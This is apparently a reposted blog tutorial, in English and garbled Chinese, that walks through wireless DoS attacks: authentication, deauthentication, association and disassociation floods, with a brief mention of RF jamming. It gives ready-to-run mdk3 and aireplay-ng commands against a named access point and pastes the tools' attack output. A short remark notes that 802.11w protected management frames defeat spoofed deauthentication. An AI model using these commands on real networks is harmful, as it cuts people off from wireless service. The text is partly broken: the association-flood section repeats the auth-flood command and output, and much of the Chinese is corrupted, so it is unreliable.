Wireless DoS tools: MDK3, Charon (a graphical front-end for MDK3), aireplay-ng

Wireless client states: IEEE 802.11 defines a client state machine that tracks each station's authentication and association status. State 1 is unauthenticated and unassociated, State 2 authenticated but unassociated, State 3 authenticated and associated; only a State 3 station exchanges data. The four flood attacks below all manipulate this machine with unprotected management frames, either by pushing forged stations into States 2 and 3 until the AP's tables are exhausted, or by pushing real stations back down to State 1 or 2.

I. Auth Flood attack

Auth Flood is the authentication flood attack. Its victims are the clients that have already authenticated and associated with the AP. The attacker sends the AP a large number of forged authentication request frames (forged station addresses, authentication algorithm and status code fields); each one costs the AP processing time and a state-table entry, and once the flood exceeds what the AP can handle it drops, or stops serving, its other wireless connections.

Attack steps:
1. Run airodump-ng wlan0mon to survey the current wireless environment (wlan0mon is the interface in monitor mode).
2. Run mdk3 wlan0mon a -a D8:15:0D:2D:CB:58 [-s]
where:
a is MDK3's authentication DoS mode (forged authentication frames from random station MACs); -a <ap_mac> restricts the attack to the given AP, otherwise every AP in range is hit; -s <pps> sets the send rate in packets per second (MDK3's default is unlimited).
當(dāng)攻擊成功后,指定的AP會(huì)有很多的不存在的無(wú)線站點(diǎn)與之聯(lián)系。 1 airodump-ng wlan0mon命令窗口 結(jié)果如下: CH 9 ][ Elapsed: 3 mins ][ 2017-04-29 16:23 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID D8:15:0D:2D:CB:58 -31 112 163 0 11 54e. WPA2 CCMP PSK 2DCB58 BSSID STATION PWR Rate Lost Frames Probe D8:15:0D:2D:CB:58 F8:F2:BC:C6:51:5D 0 0 - 1 0 1 D8:15:0D:2D:CB:58 F3:40:CE:5E:A1:8A 0 0 - 0 0 1 D8:15:0D:2D:CB:58 BC:1A:0E:BD:3F:D1 0 0 - 0 0 1 D8:15:0D:2D:CB:58 32:5B:DC:7C:DE:9F 0 0 - 1 0 1 D8:15:0D:2D:CB:58 A7:31:EC:CF:2B:5C 0 0 - 0 0 1 D8:15:0D:2D:CB:58 AA:87:1B:45:07:C5 0 0 - 1 0 1 D8:15:0D:2D:CB:58 16:EF:9B:80:A9:63 0 0 - 1 0 1 D8:15:0D:2D:CB:58 AE:C1:8E:C0:B6:26 0 0 - 1 0 1 D8:15:0D:2D:CB:58 84:3C:B5:5D:E1:00 0 0 - 1 0 1 D8:15:0D:2D:CB:58 C9:80:8B:1A:8F:7E 0 0 - 1 0 1 D8:15:0D:2D:CB:58 D9:A3:50:0F:F2:40 0 0 - 0 0 1 D8:15:0D:2D:CB:58 79:C5:24:71:A8:5E 0 0 - 0 0 1 D8:15:0D:2D:CB:58 20:EB:6C:93:84:56 0 0 - 1 0 1 2 mdk3 wlan0mon a -a D8:15:0D:2D:CB:58 命令窗口如下: Device is still responding with 304500 clients connected! AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE! Device is still responding with 305000 clients connected! Connecting Client: F8:3B:97:58:E8:AF to target AP: D8:15:0D:2D:CB:58 AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE! Device is still responding with 305500 clients connected! AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE! Device is still responding with 306000 clients connected! Connecting Client: 5E:08:C2:3A:77:49 to target AP: D8:15:0D:2D:CB:58 AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE! Device is still responding with 306500 clients connected! AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE! Device is still responding with 307000 clients connected! Connecting Client: 8D:BC:1B:E5:24:C7 to target AP: D8:15:0D:2D:CB:58 AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE! Device is still responding with 307500 clients connected! AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE! 
3. Capture packets and inspect the wireless traffic.

II. Deauth Flood attack

Deauth Flood is the deauthentication flood attack. It forces clients into the unassociated/unauthenticated state (State 1) by spoofing deauthentication frames from the AP to each client's unicast address. With current tools this is a very effective and fast way to interrupt a client's wireless service. Typically the client re-authenticates and re-associates to regain service before the attacker sends the next deauthentication frame, so the attacker has to keep spoofing deauthentication frames to keep every client persistently denied service.

Attack steps:
1. Run airodump-ng wlan0mon to survey the current wireless environment.
2. Run mdk3 wlan0mon d -c 1[,6,11] [-w file1 -b file2], or alternatively use aireplay-ng -0 0 -a <bssid> [-c <client>] wlan0mon for the deauthentication attack
where:
d is MDK3's deauthentication/disassociation "amok" mode, which kicks every station it sees off its AP by sending both deauthentication and disassociation frames; -c <chan[,chan,...]> lists the channel(s) to hop across; -w <file> is a whitelist of MACs to leave alone; -b <file> is a blacklist of MACs to attack exclusively. For aireplay-ng, -0 <count> selects deauthentication mode with count 0 meaning send forever, -a is the AP's BSSID and -c the target client (omit -c to send broadcast deauthentication frames).

Both tools rely on management frames being unauthenticated. An AP and clients that negotiate 802.11w Protected Management Frames (PMF, mandatory in WPA3) ignore spoofed deauthentication and disassociation frames, so check the RSN capabilities in the beacon before assuming this attack will work.
攻擊成功后,所屬信道的AP的客戶端會(huì)斷開(kāi)連接 1 airodump-ng wlan0mon 命令窗口,結(jié)果如下: CH 14 ][ Elapsed: 6 mins ][ 2017-04-29 16:54 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID D8:15:0D:2D:CB:58 -63 683 1186 0 11 54e. WPA2 CCMP PSK 2DCB58 BSSID STATION PWR Rate Lost Frames Probe D8:15:0D:2D:CB:58 FF:FF:FF:FF:FF:FF 0 0 - 0 0 8 D8:15:0D:2D:CB:58 20:82:C0:A9:E2:A6 0 1e- 0 0 147 D8:15:0D:2D:CB:58 5C:E0:C5:1A:17:C9 -52 0 - 1e 0 33 D8:15:0D:2D:CB:58 00:5A:13:2F:04:A0 -42 0e- 1e 0 1644 2 mdk3 wlan0mon d -c 11 Disconnecting between: 00:5A:13:2F:04:A0 and: D8:15:0D:2D:CB:58 Disconnecting between: FF:FF:FF:FF:FF:FF and: E4:F3:F5:00:0C:A0 on channel: 11 Disconnecting between: 00:5A:13:2F:04:A0 and: D8:15:0D:2D:CB:58 on channel: 11 Disconnecting between: 00:5A:13:2F:04:A0 and: D8:15:0D:2D:CB:58 on channel: 11 Disconnecting between: FF:FF:FF:FF:FF:FF and: E4:F3:F5:00:0C:A0 on channel: 11 Disconnecting between: 00:5A:13:2F:04:A0 and: D8:15:0D:2D:CB:58 on channel: 11 Disconnecting between: 00:5A:13:2F:04:A0 and: D8:15:0D:2D:CB:58 on channel: 11 3 抓包查看無(wú)線流量情況 三、Association Flood攻擊 Association Flood攻擊即為關(guān)聯(lián)洪水攻擊。在無(wú)線路由器或者接入點(diǎn)內(nèi)置一個(gè)列表即為連接狀態(tài)表,里面可顯示出所有與該AP建立連接的無(wú)線客戶端狀態(tài)。它試圖通過(guò)利用大量模仿和偽造的無(wú)線客戶端關(guān)聯(lián)來(lái)填充AP的客戶端關(guān)聯(lián)表,從而達(dá)到淹沒(méi)AP的目的。 由于開(kāi)放身份驗(yàn)證(空身份驗(yàn)證)允許任何客戶端通過(guò)身份驗(yàn)證后關(guān)聯(lián)。利用這種漏洞的攻擊者可以通過(guò)創(chuàng)建多個(gè)到達(dá)已連接或已關(guān)聯(lián)的客戶端來(lái)模仿很多客戶端,從而淹沒(méi)目標(biāo)AP的客戶端關(guān)聯(lián)表。 攻擊步驟: 1 使用airodump-ng wlan0mon 查看當(dāng)前無(wú)線網(wǎng)絡(luò)狀況 2 mdk3 wlan0mon a -a D8:15:0D:2D:CB:58 [-s] 其中:
當(dāng)攻擊成功后,指定的AP會(huì)有很多的不存在的無(wú)線站點(diǎn)與之聯(lián)系。 1 airodump-ng wlan0mon命令窗口 結(jié)果如下 CH 9 ][ Elapsed: 3 mins ][ 2017-04-29 16:23 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID D8:15:0D:2D:CB:58 -31 112 163 0 11 54e. WPA2 CCMP PSK 2DCB58 BSSID STATION PWR Rate Lost Frames Probe D8:15:0D:2D:CB:58 F8:F2:BC:C6:51:5D 0 0 - 1 0 1 D8:15:0D:2D:CB:58 F3:40:CE:5E:A1:8A 0 0 - 0 0 1 D8:15:0D:2D:CB:58 BC:1A:0E:BD:3F:D1 0 0 - 0 0 1 D8:15:0D:2D:CB:58 32:5B:DC:7C:DE:9F 0 0 - 1 0 1 D8:15:0D:2D:CB:58 A7:31:EC:CF:2B:5C 0 0 - 0 0 1 D8:15:0D:2D:CB:58 AA:87:1B:45:07:C5 0 0 - 1 0 1 D8:15:0D:2D:CB:58 16:EF:9B:80:A9:63 0 0 - 1 0 1 D8:15:0D:2D:CB:58 AE:C1:8E:C0:B6:26 0 0 - 1 0 1 D8:15:0D:2D:CB:58 84:3C:B5:5D:E1:00 0 0 - 1 0 1 D8:15:0D:2D:CB:58 C9:80:8B:1A:8F:7E 0 0 - 1 0 1 D8:15:0D:2D:CB:58 D9:A3:50:0F:F2:40 0 0 - 0 0 1 D8:15:0D:2D:CB:58 79:C5:24:71:A8:5E 0 0 - 0 0 1 D8:15:0D:2D:CB:58 20:EB:6C:93:84:56 0 0 - 1 0 1 2 mdk3 wlan0mon a -a D8:15:0D:2D:CB:58 命令窗口如下: Device is still responding with 304500 clients connected! AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE! Device is still responding with 305000 clients connected! Connecting Client: F8:3B:97:58:E8:AF to target AP: D8:15:0D:2D:CB:58 AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE! Device is still responding with 305500 clients connected! AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE! Device is still responding with 306000 clients connected! Connecting Client: 5E:08:C2:3A:77:49 to target AP: D8:15:0D:2D:CB:58 AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE! Device is still responding with 306500 clients connected! AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE! Device is still responding with 307000 clients connected! Connecting Client: 8D:BC:1B:E5:24:C7 to target AP: D8:15:0D:2D:CB:58 AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE! Device is still responding with 307500 clients connected! AP D8:15:0D:2D:CB:58 seems to be INVULNERABLE! 
3. Capture packets and inspect the wireless traffic.

Another form of this attack uses a large number of wireless NICs, or a modified transmitter that bundles many wireless chipsets (along the lines of the "SMS bulk sender" boxes). A large-scale association attack from such hardware is also effective against the access points in wide use today.

IV. Disassociation Flood attack

Disassociation Flood is the disassociation flood attack, and it behaves much like the deauthentication flood. It forces clients out of the associated state by spoofing disassociation frames from the AP to the client; a disassociated client stays authenticated (State 2), so it only has to re-associate to regain service, which it typically does before the attacker sends the next disassociation frame. The attacker has to keep spoofing disassociation frames to keep the client persistently denied service.

Disassociation Broadcast and Disassociation Flood work on the same principle and differ only in rate and tooling. The former is often used to support a wireless man-in-the-middle attack (pushing clients off the real AP), while the latter is used for targeted point-to-point wireless DoS, for example disrupting or jamming the access points of a specific organisation or department.

Attack steps:
1. Run airodump-ng wlan0mon to survey the current wireless environment.
2. Run mdk3 wlan0mon d -c 1[,6,11] [-w file1 -b file2]
where:
the options are the same as in section II. MDK3's mode d sends both deauthentication and disassociation frames, so the same command serves both attacks.
攻擊成功后,所屬信道的AP的客戶端會(huì)斷開(kāi)連接 1,airodump-ng wlan0mon 命令窗口,結(jié)果如下: CH 14 ][ Elapsed: 6 mins ][ 2017-04-29 16:54 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID D8:15:0D:2D:CB:58 -63 683 1186 0 11 54e. WPA2 CCMP PSK 2DCB58 BSSID STATION PWR Rate Lost Frames Probe D8:15:0D:2D:CB:58 FF:FF:FF:FF:FF:FF 0 0 - 0 0 8 D8:15:0D:2D:CB:58 20:82:C0:A9:E2:A6 0 1e- 0 0 147 D8:15:0D:2D:CB:58 5C:E0:C5:1A:17:C9 -52 0 - 1e 0 33 D8:15:0D:2D:CB:58 00:5A:13:2F:04:A0 -42 0e- 1e 0 1644 2,mdk3 wlan0mon d -c 11 Disconnecting between: 00:5A:13:2F:04:A0 and: D8:15:0D:2D:CB:58 Disconnecting between: FF:FF:FF:FF:FF:FF and: E4:F3:F5:00:0C:A0 on channel: 11 Disconnecting between: 00:5A:13:2F:04:A0 and: D8:15:0D:2D:CB:58 on channel: 11 Disconnecting between: 00:5A:13:2F:04:A0 and: D8:15:0D:2D:CB:58 on channel: 11 Disconnecting between: FF:FF:FF:FF:FF:FF and: E4:F3:F5:00:0C:A0 on channel: 11 Disconnecting between: 00:5A:13:2F:04:A0 and: D8:15:0D:2D:CB:58 on channel: 11 Disconnecting between: 00:5A:13:2F:04:A0 and: D8:15:0D:2D:CB:58 on channel: 11 3,抓包查看無(wú)線流量情況 五、RF Jamming攻擊 RF Jamming攻擊即為RF干擾攻擊。該攻擊是通過(guò)發(fā)出干擾射頻達(dá)到破壞正常無(wú)線通信的目的。而前面幾種攻擊主要是基于無(wú)線通信過(guò)程及協(xié)議的。RF為射頻,主要包括無(wú)線信號(hào)發(fā)射機(jī)及收信機(jī)等。 這里因環(huán)境限制身旁沒(méi)有測(cè)試設(shè)備,所以具體的數(shù)據(jù)包無(wú)法展示,后面有機(jī)會(huì)再單獨(dú)展開(kāi)。 |
來(lái)自: 大隆龍 > 《編程技術(shù)》